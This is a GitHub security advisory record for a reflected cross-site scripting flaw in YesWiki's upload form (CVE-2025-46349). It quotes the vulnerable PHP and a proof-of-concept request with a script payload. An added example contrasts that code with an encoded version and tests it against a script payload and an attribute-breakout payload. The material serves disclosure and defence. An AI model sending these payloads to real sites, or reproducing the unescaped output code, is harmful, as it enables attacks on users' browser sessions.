{ "schema_version": "1.4.0", "id": "GHSA-2f8p-qqx2-gwr2", "modified": "2025-04-29T20:27:19Z", "published": "2025-04-29T14:38:12Z", "aliases": [ "CVE-2025-46349" ], "summary": "YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting",
"details": "### Summary\nA reflected cross-site scripting (XSS) vulnerability has been detected in the file upload form. It can be exploited without authentication.\n\nThis proof of concept was performed using the following:\n\n- YesWiki v4.5.3 (doryphore-dev branch)\n- Docker environment (docker/docker-compose.yml)\n\n### Vulnerable code\nThe vulnerability is located in the [file](https://github.com/YesWiki/yeswiki/blob/6894234bbde6ab168bf4253f9a581bd24bf53766/tools/attach/libs/attach.lib.php#L724-L735). `showUploadForm()` reads the `file` request parameter and concatenates it into the page heading (HTML text context) and into a hidden `<input>` (attribute context) without any encoding, so whatever the attacker puts in the parameter is reflected verbatim into the response:\n```php\n    // Markup inside this block was lost in extraction and is restored from\n    // context; see the linked source for the exact tags and labels.\n    public function showUploadForm()\n    {\n        $this->file = $_GET['file'];\n        echo '<h4>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . \"</h4>\\n\";\n        echo '<form enctype=\"multipart/form-data\" name=\"frmUpload\" method=\"POST\" action=\"' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . \"\\\">\\n\"\n            . '\t<input type=\"hidden\" name=\"wiki\" value=\"' . $this->wiki->GetPageTag() . \"/upload\\\" />\\n\"\n            . '\t<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"' . $this->attachConfig['max_file_size'] . \"\\\" />\\n\"\n            . \"\t<input type=\\\"hidden\\\" name=\\\"file\\\" value=\\\"$this->file\\\" />\\n\"\n            . \"\t<input type=\\\"file\\\" name=\\\"upFile\\\" size=\\\"50\\\" />\\n\"\n            . '\t<input type=\"submit\" value=\"' . _t('ATTACH_SUBMIT') . \"\\\" />\\n\"\n            . \"</form>\\n\";\n    }\n```\n### PoC\n1. Send a request to the upload endpoint with a script payload in the `file` parameter (the value below URL-decodes to `<script>alert(document.domain)</script>`). Because the parameter is reflected without encoding, the script executes in the client:\n```\nGET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: localhost:8085\nCache-Control: max-age=0\nsec-ch-ua: \"Chromium\";v=\"135\", \"Not-A.Brand\";v=\"8\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"macOS\"\nAccept-Language: ru-RU,ru;q=0.9\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n```\n2. The response contains the payload verbatim and the browser executes it. (Screenshot of the resulting alert dialog: image not included.)\n\n### Impact\nAn unauthenticated attacker can craft a link that, when opened by a victim, runs attacker-controlled JavaScript in the victim's browser within the wiki's origin and can perform arbitrary actions in the victim's context.",
"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L" } ],
"affected": [ { "package": { "ecosystem": "Packagist", "name": "yeswiki/yeswiki" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.5.3" } ] } ] } ],
"references": [ { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-2f8p-qqx2-gwr2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46349" }, { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/pull/1264/commits/6edde40eb7eeb5d60619ac4d1e0a0422d92e9524" }, { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/commit/0dac9e2fb2a5e69f13a3c9f761ecae6ed9676206" }, { "type": "PACKAGE", "url": "https://github.com/YesWiki/yeswiki" }, { "type": "WEB", "url": 
"https://github.com/YesWiki/yeswiki/blob/6894234bbde6ab168bf4253f9a581bd24bf53766/tools/attach/libs/attach.lib.php#L724-L735" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-04-29T14:38:12Z", "nvd_published_at": "2025-04-29T18:15:44Z" } }
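The unescaped reflection in `showUploadForm()` next to a hardened rendering, as an added example: this is not YesWiki's code and not the upstream fix commit, only one correct way to encode the value before output. `renderVulnerable`, `renderHardened`, `encodeHtml` and the `UPLOAD_LABEL` stand-in for the translated `_t()` string are hypothetical names, and the second payload (an attribute breakout that needs no `<`) is constructed here to go beyond the advisory's `<script>` PoC and show why quote encoding matters for the hidden `file` input, which reuses the same value in attribute context.

```php
<?php
// Added example, not YesWiki code: the vulnerable concatenation from
// showUploadForm() next to a hardened version, exercised with the
// advisory's PoC payload and a constructed attribute-breakout payload.
declare(strict_types=1);

// Placeholder for _t('ATTACH_UPLOAD_FORM_FOR_FILE'); the real label is translated.
const UPLOAD_LABEL = 'Upload form for file';

// Vulnerable: the untrusted value lands raw in both HTML text and attribute context.
function renderVulnerable(string $file): string
{
    return '<h4>' . UPLOAD_LABEL . ' ' . $file . "</h4>\n"
        . "\t<input type=\"hidden\" name=\"file\" value=\"$file\" />\n";
}

// Hardened: encode once for HTML. ENT_QUOTES also encodes ' and " so the same
// encoded value is safe inside a double-quoted attribute; ENT_SUBSTITUTE keeps
// invalid UTF-8 from turning the whole string into '' (which would silently
// drop the field instead of rendering a replacement character).
function encodeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderHardened(string $file): string
{
    $safe = encodeHtml($file);
    return '<h4>' . UPLOAD_LABEL . ' ' . $safe . "</h4>\n"
        . "\t<input type=\"hidden\" name=\"file\" value=\"$safe\" />\n";
}

// Constructed inputs: the advisory's PoC payload (URL-decoded) and an
// attribute-breakout variant that contains no '<' at all.
$payloads = [
    '<script>alert(document.domain)</script>',
    '" autofocus onfocus="alert(document.domain)',
];

// With an empty input, the only '<' and '"' characters in the output are the
// ones the renderer itself emits; any extra ones after encoding a payload
// would mean raw attacker characters leaked through.
$baseline = renderHardened('');

foreach ($payloads as $payload) {
    $vuln = renderVulnerable($payload);
    $safe = renderHardened($payload);
    echo "payload:   $payload\n";
    echo "vulnerable:\n$vuln";
    echo "hardened:\n$safe\n";

    foreach (['<', '"'] as $ch) {
        if (substr_count($safe, $ch) !== substr_count($baseline, $ch)) {
            throw new RuntimeException("raw '$ch' leaked into output for: $payload");
        }
    }
}
echo "all payloads neutralised\n";
```

Run with `php example.php`. The vulnerable output for the second payload shows the hidden field become `value="" autofocus onfocus="alert(document.domain)" />`, which is why encoding only `<` and `>` (or only in the heading) would not be enough; the hardened output keeps both payloads as inert text.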